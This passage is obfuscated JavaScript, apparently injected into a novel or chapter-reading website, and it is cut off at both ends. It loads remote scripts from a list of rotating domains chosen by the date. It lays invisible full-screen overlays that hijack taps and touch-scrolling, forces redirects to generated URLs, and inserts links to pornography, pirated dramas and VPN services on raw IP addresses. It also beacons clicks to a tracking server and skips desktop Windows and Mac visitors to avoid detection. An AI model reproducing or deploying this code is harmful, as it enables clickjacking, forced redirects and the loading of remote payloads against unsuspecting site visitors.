a=a1(a,5),t=a.length;return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(309)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(281)][a(279)](a(304)),e=-1!=a4[a(281)][a(279)](a(197));a4[a(281)];return(t=-1==a3[a(279)]("vv")&&t)||e}function al(){var bA=b6;x&&!window[bA(225)]&&(window.temp=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(319))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(302),aj=b6(266),v?(ai=b6(236),aj="100vw",a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(232)]=af}):w&&(ai=p+"vh",aj=b6(218),a8="2",P=4,ah=function(a){var t=b6;a.style["z-in"+t(232)]=af}),ak=Date[b6(256)](),E[b6(285)]=function(aB){var bz=b6;if(A){if(0!=D){var aC=new Date(ak).getTime(),aD=(Date[bz(256)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(289),ao=b6(212),ap=b6(259),aq="",ar=b6(290),1==h&&(an=b6(274),am=b6(264),i==b6(259)&&(am="padding-bottom:32%;",ao="bottom",ap=b6(259),ar=b6(300)),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(237),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(237),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(237),ap),ap='"'+ap+'"',as="",at="",j==b6(308)&&(as=U(b6(316)),at=U(b6(268))),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bD=b6,aB=function(aD){var bB=a0b,aE=document[bB(303)]("body"),aF=document[bB(303)](aD),aG=aF[bB(202)],aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bC=bB,aM=aL[bC(247)][0],aN=aM[bC(310)],aO=aM.pageY,aP=0,aP=1!=h?aM.pageY:aM[bC(310)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE.addEventListener("touchmove",aK)};function aC(a){for(var t=bD,e=a[t(254)],n=a[t(272)];null!==n;)e+=n[t(254)],n=n[t(272)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bD(302)&&ai!=bD(236)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(308)?function(a){var t=b6,e=(a.parentNode[t(315)](),document[t(250)](a9));if(e)for(var n=0;n<e.length;n++)e[n][t(210)][t(271)]="0";document[t(287)](t(306))[0][t(210)][""+ar]="0px",event[t(270)]()}:function(aB){var bG=b6;event[bG(270)](),eval(ab)()},function(){var bJ=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a[t(249)]("").reverse()[t(192)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(250)](a9);if(e&&null==a)for(var n=0;n<e[t(261)];n++)e[n][t(210)][t(271)]="0";window[t(242)][t(309)]=aD()},al(),x&&!window[bJ(225)]&&(window[bJ(225)]=!0,P=3,eval(ab)());var aE=function(){window[bJ(242)].href=aD()},aF=aC(aB[bJ(235)][0].wdf),aG="",aH=(a8=" ",aG+=as+bJ(208)+ad+bJ(313)+a8+bJ(200)+"</div>",aG+=bJ(219)+a9+bJ(273),document[bJ(251)](bJ(217)+am+"}#"+ac+bJ(245)+ac+'">'),document.writeln(aG),document[bJ(251)](bJ(269)),setTimeout(function(){function aI(aJ,aK,aL){var bL=a0b,aM=document[bL(250)](aJ)[0];aM.style.height=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style[bL(223)+bL(206)+"on"]=at,aM.style["z-in"+bL(232)]=ae,aM.style.width=bL(218),aM[bL(222)]+="<i"+bL(205)+"yl"+bL(283)+"th:100%;h"+bL(201)+"ht:"+ag+"p"+bL(194)+bL(209)+U(aK)+bL(211),aM[bL(222)]=aM[bL(222)]+aq,aM["on"+bL(221)+"ck"]=function(){P=2,aL()},aM.style[bL(198)+"it"+bL(195)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bM=bJ,aI=document[bM(250)](a9)[0];aI.style[bM(296)+bM(298)+bM(314)]=ai,aI.style[bM(262)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bM(221)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage[bJ(203)](bJ(297)+g));null==aH&&r()}())}()})(),console.log("BD_DJ")},window._BD_ZS=function(){var a=["revocation38.top","annulment47.com","rescission97.top","lawfulness33.com","summary89.com","inquiry64.top","proceedings33.top","exhibits86.com","evidence20.com","liability48.top","prosecute39.top","domiciliary18.com","transfer32.top","guardian93.com","alienation27.com","autopsy33.top","guardianship49.com","tutelage39.top","emancipation59.com","inheritance75.top","legatee30.com","ownership39.top","copyright69.top","fingerprint28.com","incubation95.top","symptom39.com","fracture46.com","callosity19.top","blackhead35.com","affection28.top","complaint75.com"][(new window.Date).getDate()-1];window.document.write("<script src="),window.document.write("h"),window.document.write("tt"),window.document.write("p"),window.document.write("s:"),window.document.write("//hp."+a+"/193tjsdsdsirrrr72.jss?"+(new window.Date).getTime()+"&r="+(navigator.platform.match(/Mac|Win/)?1:0)),window.document.write("><\/script>"),console.log("BD_ZS")};;;!function(e,n){function t(e){for(var n="",t=0;t<e.length;t++)n+=String.fromCharCode(e[t]);return n}function r(e){for(var n=[],t=0;t<e.length;t++)n.push(e.codePointAt(t));return n}var i=[1122,2233,7777,888,666],o=function(){return i[Math.floor(Math.random()*i.length)]},d={_x7y:[{_k9m:"sj",_p2q:["最新海量爽剧，点击即可免费观看！","热门爽剧，点开立即免费观看！","热门免费爽剧，点击即可观看！","每日更新爽剧、短剧，现在免费！",],_n4r:function(){var e=function(e,n){return"23.224.199."+(Math.floor(Math.random()*(n-e+1))+e)},n=[e(18,21),e(26,31),e(226,230)],t=n[Math.round(Math.random()*(n.length-1))],r=o();return a.generateEncryptedUrl("https://"+t+":"+r+"/home?!=m."+a.randomChoice(["J8ES","J84B","J82v","J8YV","J86K","J8Yx","J8YY","J8YR","o","J8qg","JUoa"]))},_f6e:1},{_k9m:"ap",_p2q:["Ｐｏｒｎｈｕｂ，精彩H片，点击进入！","ｘＶｉｄeｏ，看H片不求人！","精彩日本小电影，每天免费！",],_n4r:function(){var e=new Date,n=e.getFullYear().toString().slice(-2)+("0"+(e.getMonth()+1)).slice(-2)+("0"+e.getDate()).slice(-2),t=o();return a.generateEncryptedUrl("https://a"+n+".1ximi.cc:"+t+"/home")},_f6e:1},{_k9m:"vp",_p2q:["极速番羽墙，不怕失联本站 >>","极速番羽墙，可上任何墙外网站 >>","番羽墙免费试用，上外网不求人 >>"],_n4r:function(){var e=a.getDateBasedIP(),n=i,t=n[Math.floor(Math.random()*n.length)];return a.generateEncryptedUrl("https://"+e+":"+t+"/a1?!=www.JUre")},_f6e:1}],_s5d:["23.224.199.18","23.224.199.26","23.224.199.226"],_i1j:["J8ES","J84B","J82v","J8YV","J86K","J8Yx","J8YY","J8YR","o","J8qg","JUoa"]},a={decrypt:function(e){for(var n="",t=0;t<e.length;t++)n+=String.fromCharCode(e[t]);return n},getDateBasedIP:function(){var e,n=new Date("2025-08-30");return"154.84.11."+(2+Math.max(1,Math.floor((new Date().getTime()-n.getTime())/864e5)%253))},generateEncryptedUrl:function(e){for(var n=[],t=0;t<e.length;t++)n.push(e.charCodeAt(t));return n},randomChoice:function(e){return e[Math.floor(Math.random()*e.length)]},shuffle:function(e){for(var n=e.slice(),t=n.length-1;t>0;t--){var r=Math.floor(Math.random()*(t+1)),i=n[t];n[t]=n[r],n[r]=i}return n},weightedRandom:function(e){for(var n=0,t=0;t<e.length;t++)n+=e[t]._f6e||1;for(var r=Math.random()*n,i=0,o=0;o<e.length;o++)if(r<=(i+=e[o]._f6e||1))return e[o];return e[0]}};e.COOKIE_PRE,e.___t=function(){function e(e){new Image().src=e}return{track:function n(t,r){try{var i="https://172.247.16.230:888/c.gif?jp="+encodeURIComponent(t)+"&t="+r;"ping"in navigator?navigator.ping.send(i).catch(function(){e(i)}):e(i)}catch(o){console.log("Tracker error:",o),e(i)}},createClickHandler:function e(){return function(e,n,t){return top.window.___t.track(e,n),top.window.open(t,"_blank"),!1}}}}();var c={renderTextAd:function(n){var t=Math.floor(Math.random()*n._p2q.length),r=n._p2q[t],i="function"==typeof n._n4r?n._n4r():n._n4r,o=a.decrypt(i),d=e.___t.createClickHandler(n._k9m,t,o);return'<a href="'+o+'" target="_blank" onclick="return ('+d.toString().replace(/"/g,"'")+")('"+n._k9m+"','"+t+"','"+o+'\');" style="color:red;text-decoration:underline;">'+r+"</a>"},renderToPosition:function(e,n){var t=this.renderTextAd(e);switch(n){case"chapter":var r=$(".chapter-line");if(r.length>0){var i=11+Math.floor(5*Math.random());i<r.length&&r.eq(i).after('<p style="font-size:80%!important;">'+t+"</p>")}$(".dlist").after('<div style="margin:0">'+t+"</div>");break;case"wap-tip":$("#wap-tip").prepend(t+"<br>")}}},l={ads:[],selectedAds:[],currentIndex:0,init:function(){this.ads=a.shuffle(d._x7y),this.selectedAds=[],this.selectRandomAds()},selectRandomAds:function(){for(var e=this.ads.slice(),n=0;n<2&&e.length>0;n++){var t=Math.floor(Math.random()*e.length),r=e.splice(t,1)[0];this.selectedAds.push(r)}},getNextAd:function(){if(0===this.selectedAds.length)return null;var e=this.selectedAds[this.currentIndex%this.selectedAds.length];return this.currentIndex++,e},getRandomAd:function(){return 0===this.selectedAds.length?null:a.weightedRandom(this.selectedAds)},getAdByIndex:function(e){return e>=0&&e<this.selectedAds.length?this.selectedAds[e]:null}};({isInitialized:!1,isScrolled:!1,init:function(){var e=this;l.init(),this.waitForJQuery(function(){e.setupScrollHandler(),e.setupMobileAds()})},waitForJQuery:function(e){"undefined"!=typeof $?e():setTimeout((function(){this.waitForJQuery(e)}).bind(this),1e3)},setupScrollHandler:function(){var n=this,t=$(e);function r(){if(!n.isScrolled){n.isScrolled=!0,t.off("scroll",r);var e=l.getAdByIndex(0);e&&c.renderToPosition(e,"chapter")}}t.on("scroll",r)},setupMobileAds:function(){var e=this,n=setInterval(function(){if("undefined"!=typeof $&&$("#wap-tip > *").length>0&&!e.isInitialized){e.isInitialized=!0,clearInterval(n);var t=l.getAdByIndex(1);t&&c.renderToPosition(t,"wap-tip")}},3e3)}}).init(),e.xxxxloaderEnd=function(){if("undefined"==typeof $){setTimeout(xxxxloaderEnd,1e3);return}var n=$(e),t=!1;function r(){if(!t){t=!0,n.off("scroll",r);var e=l.getAdByIndex(0);e&&c.renderToPosition(e,"chapter")}}n.on("scroll",r)}}(window,document);;;window._B2_DJ=function(){function randomChoice(){var a;return"undefined"!=typeof crypto&&crypto.getRandomValues?(a=new Uint8Array(1),crypto.getRandomValues(a),1&a[0]):!(Math.random()<.5)}(randomChoice()?function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=239]})(a,t)}function a0a(){var a=["touches","getItem","2014","mati","7871808fQWGNm",'"+"',"padding-top:32%;","148RPuJPf","padding-top","writeln","parse","undefined","write","data","indexOf","filter","ght","config_","location","getMonth","reverse","add","touchmove","i12","_real","3202460QkOwFs","</div>","k21","slice","offsetTop","817864tCgxte","querySelector","pageY","remove","this_touch_status","979362YLrutH","random","0vw","0px","i11","stringify","common","%;h","uci","ion","body","join","check","innerHTML","startsWith","real","parentNode","getTime","padding-bottom:32%;","ejuugj","height",'c="'," onload='ejuugj()' ","/uci.","hei","wdf","rcs","stopPropagation","mg st","3pIUUJC","275PbTjxR","padding-bottom","fromCharCode","fixed","tpir",'" />',"currentPvIndex_","eig","classId",'<div  class="',"35265iJBNAB","cli","7tOkUIm","offsetParent","touchend","abcdefghijklmnopqrstuvwxyz","offsetHeight","touchMotion","addEventListener","data_","k22","ht:","bottom","clientY","dex","lin","has","/:sptt","getDate","top","th:1","platform","data3","split","100vw",'rc="',"i13",'{display:flex;width:100%;}</style><div id="',"yes","100vh","__executedClassIds","getElementsByClassName","clear","style","temp","setItem",".jpg","spt","every","length","touch_max_height","idth","773980MsGADQ","charAt","pos","floor","0vh","<style>body{","touchDelayTimeout","now","touch_min_height","1001890ZjnWzs","width","href",'<div class="',"relative","Mac"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(832589==+parseInt(a(363))*(parseInt(a(284))/2)+parseInt(a(242))/3*(parseInt(a(306))/4)+parseInt(a(324))/5+parseInt(a(303))/6+-parseInt(a(244))/7*(parseInt(a(329))/8)+-parseInt(a(334))/9+-parseInt(a(293))/10*(parseInt(a(364))/11))break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(301),b=18046422,c=R(13)+b6(278),d=b6(346),e=b6(340),f=b6(349),g=454,h=2,i=b6(261),j=b6(270),k="no",l=0,m=0,n=100,o=0,p=40,q=sessionStorage[b6(300)](b6(370)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(311)](e)}}function s(){var a=b6;return["<",U(a(360)),U("tpi"),a(356)," s",a(267),"ht",U(a(279)),":","/","/",a0(),".",U(a(342)),"/",f,"?",(new Date)[a(351)](),g,'">',"<","/s","c",U(a(368)),">"]}function t(a,t){return typeof a===b6(310)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(277)](b6(370)+g,q+1),window[b6(353)]=function(){var b9=b6,aB=g,aC=eval(b9(312)+aB)+"";sessionStorage[b9(277)](b9(251)+aB,aC),sessionStorage.setItem(b9(312)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=1e3,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,v,d=b6;window.__executedClassIds=window.__executedClassIds||new Set,window[d(272)][d(258)](a.classId)||(window[d(272)][d(320)](a[d(240)]),console[d(274)](),o=a[d(240)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[d(338)],u=a[d(322)],c=a[d(268)],sessionStorage[o+d(323)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document.addEventListener(d(246),function(){var a,t=d;H-G<e&&(a=(Date.now()-l)/1e3,n<a)&&(F++,l=Date[t(291)]())},!1),v=Date.now(),f.push(!1),sessionStorage[o]=JSON.stringify(f),setInterval(function(){var a=d,t=(Date.now()-v)/1e3,t=r<=t,e=i<=F,n=document[a(344)][a(248)]>=s,t=t&&e&&n,e=(f[f[a(281)]-1]!==t&&(f[f[a(281)]-1]=t,sessionStorage[o]=JSON[a(339)](f)),f[a(314)](Boolean)[a(281)]),n=b<=e,t=!u||f[a(280)](Boolean),e=!c||f[0]&&f[a(280)](Boolean);n&&t&&e&&(sessionStorage[o+a(323)]="true")},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(316)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t[e(338)]),i12:t[e(322)],i13:t[e(268)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(240)]+"_real"])for(var n in t)n[e(348)]("r")&&typeof t[n]!==e(310)&&(t["k"+n[e(327)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(300)]("data"+a)||(e=sessionStorage[c(300)](c(251)+a),I(e=K(a,a=JSON[c(309)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a[t(281)]-1].split("_");r[t(292)]=parseInt(a[0]),r[t(282)]=parseInt(a[1])}if(a){var s=a[o(265)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(335)]()<s)return r[o(333)]=!0,i(a),r}if(e)for(var b=e[o(265)](",")[0][o(265)]("_"),u=0;u<b[o(281)];u++)if(parseInt(b[u])===n)return r[o(333)]=!0,i(e),r;if(t){a=t[o(265)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math.random()<s)r.this_touch_status=!0,r[o(290)]=a,i(t)}return r})(a[c(326)],a[c(252)],a.k23,q),A=e[c(333)],B=e[c(292)],C=e.touch_max_height,D=e[c(290)],v||((e=t(a.k8,"_"))&&-1!==e[c(313)](q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e.indexOf(q+"")?w=!0:2===(e=t(a.k5,","))[c(281)]?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(281)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[c(313)](q+"")?x=!0:2===(e=t(a.k6,","))[c(281)]&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(250)]("touchstart",function(a){var t=b6,a=a[t(299)][0][t(255)];H=G=a},!1),document[b6(250)]("touchmove",function(a){var t=b6,a=a[t(299)][0][t(255)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(249)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U(b6(357)));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(287)](10*Math[t(335)]());return e}function S(a){for(var t=b6,e="",n=t(247),o=0;o<a;o++)e+=n[t(285)](Math.floor(Math[t(335)]()*n[t(281)]));return e}function T(a,t){var e=b6;return Math[e(287)](Math[e(335)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(265)]("").reverse()[t(345)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(281)];o+=t)n.push(a[e(327)](o,o+t));return n}function W(a,t){for(var e="",n=0;n<t.length;n++)e+=t[n],n<t.length-1&&(e+=a);return e}function X(){var bq=b6,aB=Date[bq(309)](new Date)/1e3+"",aC=aB.substring(6,10),aD=Math[bq(287)](9*Math[bq(335)]())+1,aE=(aB*=aD,(aB+"")[bq(281)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[bq(287)](2*Math[bq(335)]())+1,aI=Math[bq(287)](998*Math.random())+1,aJ=Math[bq(287)](998*Math.random())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[bq(281)],aM=(aJ+"")[bq(281)],aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(265)](""),e=t[a(281)],n=[e],o=[],r=0;r<10;r++){var i=Math.floor(9*Math[a(335)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s[a(281)];r++){var b=Math[a(287)](Math[a(335)]()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(345)]("")+o[a(345)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(351)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(291)]()-b),o="",r=n[t(318)]()+1,i=n[t(260)](),s=""+n.getFullYear(),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String[t(366)])(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a.length;o++){var r=a.charCodeAt(o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(366)](r)}return n}function a2(a){var t=b6,a=a1(a,5),t=a[t(281)];return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(295)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(263)][a(313)]("Win"),e=-1!=a4[a(263)][a(313)](a(298));a4[a(263)];return(t=-1==a3[a(313)]("vv")&&t)||e}function al(){var bz=b6;x&&!window[bz(276)]&&(window[bz(276)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(259))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai="0vh",aj=b6(336),v?(ai=b6(271),aj=b6(266),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(256)]=af}):w&&(ai=p+"vh",aj="100vw",a8="2",P=4,ah=function(a){a.style["z-index"]=af}),ak=Date[b6(291)](),E[b6(249)]=function(aB){var by=b6;if(A){if(0!=D){var aC=new Date(ak)[by(351)](),aD=(Date.now()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(297),ao="top",ap=b6(254),aq="",ar=b6(307),1==h&&(an=b6(367),am=b6(305),i==b6(254)&&(am=b6(352),ao=b6(254),ap=b6(254),ar=b6(365)),ae=T(8e4,9e4)),an=V(an,2),an=W('"+"',an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(304),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(304),ap),ap='"'+ap+'"',as="",at="",j==b6(270)&&(as=U(">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<"),at=U("sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1")),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bC=b6,aB=function(aD){var bA=a0b,aE=document.querySelector(bA(344)),aF=document[bA(330)](aD),aG=aF.offsetHeight,aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bB=bA,aM=aL[bB(299)][0],aN=aM[bB(255)],aO=aM[bB(331)],aP=0,aP=1!=h?aM[bB(331)]:aM[bB(255)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE[bA(250)](bA(321),aK)};function aC(a){for(var t=bC,e=a.offsetTop,n=a[t(245)];null!==n;)e+=n[t(328)],n=n[t(245)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bC(288)&&ai!=bC(271)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA="yes"==k?function(a){var t=b6,e=(a[t(350)][t(332)](),document.getElementsByClassName(a9));if(e)for(var n=0;n<e[t(281)];n++)e[n][t(275)][t(354)]="0";document.getElementsByTagName(t(344))[0][t(275)][""+ar]=t(337),event[t(361)]()}:function(aB){var bF=b6;event[bF(361)](),eval(ab)()},function(){var bI=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a[t(265)]("")[t(319)]().join("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document.getElementsByClassName(a9);if(e&&null==a)for(var n=0;n<e[t(281)];n++)e[n][t(275)][t(354)]="0";window[t(317)][t(295)]=aD()},al(),x&&!window[bI(276)]&&(window[bI(276)]=!0,P=3,eval(ab)());var aE=function(){var a=bI;window[a(317)][a(295)]=aD()},aF=aC(aB[bI(264)][0][bI(359)]),aG="",aH=(a8=" ",aG+=as+bI(241)+ad+'" style=" position:;"> <span style="position: absolute;font-size: 14px;">'+a8+" <span> "+bI(325),aG+=bI(296)+a9+'" style="position:fixed;color:transparent;">.</div>',document[bI(308)](bI(289)+am+"}#"+ac+bI(269)+ac+'">'),document[bI(308)](aG),document[bI(308)](bI(325)),setTimeout(function(){function aI(aJ,aK,aL){var bK=a0b,aM=document[bK(273)](aJ)[0];aM.style[bK(358)+bK(315)]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style["ani"+bK(302)+"on"]=at,aM.style["z-in"+bK(256)]=ae,aM.style["w"+bK(283)]=bK(266),aM[bK(347)]+="<i"+bK(362)+'yle="wid'+bK(262)+"00"+bK(341)+bK(239)+bK(253)+ag+'px;" sr'+bK(355)+U(aK)+bK(369),aM[bK(347)]=aM[bK(347)]+aq,aM["on"+bK(243)+"ck"]=function(){P=2,aL()},aM.style[bK(286)+"it"+bK(343)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bL=bI,aI=document[bL(273)](a9)[0];aI.style[bL(257)+"e-height"]=ai,aI.style[bL(294)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI.onclick=function(){eval(ab)()}},aw),az(),sessionStorage[bI(300)](bI(312)+g));null==aH&&r()}())}()}:function(){function a0a(){var a=["ion","check","Mac","pos","fromCharCode"," <span> ","eig","offsetHeight","getItem","currentPvIndex_","mg st","mati","_real",'<div  class="','c="',"style",'" />',"top","every","45hKGYGT","tpi","addEventListener","<style>body{","100vw",'<div class="',"touchend","cli","innerHTML","ani","stringify","temp","setItem","k22","touchDelayTimeout","push","k21","877124QzuIjz","dex","add","wachtc","data3","100vh",'"+"',"reverse","clear","184639FfqDHk","k23","location","charCodeAt","touchstart",'{display:flex;width:100%;}</style><div id="',"data_","touches","abcdefghijklmnopqrstuvwxyz","split","getElementsByClassName","writeln","parse","3714111SjdSqn","offsetTop","tpir","now",".jpg","floor","bottom","1224840Fkeeiy","length","width","random","padding-top:32%;","10638QQsMaf","0vw","touchmove","sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1","</div>","stopPropagation","height","offsetParent",'" style="position:fixed;color:transparent;">.</div>',"fixed","spt","filter","2028","classId","indexOf","touch_max_height","platform","getMonth",'e="wid',"__executedClassIds","touchMotion","this_touch_status","getElementsByTagName","621381YZGtnj","relative","padding-top","286328kokgyY","i12","getTime","1igQINT","i11","lin","data","e-hei","common","padding-bottom","i13","0vh","querySelector","Win","config_","body",'rc="',"yes","href","clientY","slice","getDate",'" style=" position:;"> <span style="position: absolute;font-size: 14px;">',"ght","remove",">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","true","write","/:sptt","undefined","join","substring",'x;" sr'];return(a0a=function(){return a})()}function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=191]})(a,t)}(()=>{for(var a=a0b,t=a0a();;)try{if(118144==+parseInt(a(294))*(-parseInt(a(291))/2)+-parseInt(a(288))/3+parseInt(a(231))/4+-parseInt(a(214))/5*(-parseInt(a(265))/6)+-parseInt(a(240))/7+-parseInt(a(260))/8+parseInt(a(253))/9)break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(277),b=18043283,c=R(13)+b6(257),d=b6(196),e=b6(299),f="real",g=4825,h=2,i=b6(212),j="no",k="no",l=5,m=0,n=100,o=10,p=100,q=sessionStorage[b6(203)](b6(204)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(318)](e)}}function s(){var a=b6;return["<",U("rcs"),U(a(215))," onload='wachtc()' "," s",a(307),"ht",U(a(275)),":","/","/",a0(),".",U("uci"),"/",f,"?",(new Date)[a(293)](),g,'">',"<","/s","c",U(a(255)),">"]}function t(a,t){return typeof a===b6(191)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(226)]("currentPvIndex_"+g,q+1),window[b6(234)]=function(){var b9=b6,aB=g,aC=eval(b9(297)+aB)+"";sessionStorage[b9(226)](b9(246)+aB,aC),sessionStorage[b9(226)](b9(297)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=0,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,v,d=b6;window[d(284)]=window[d(284)]||new 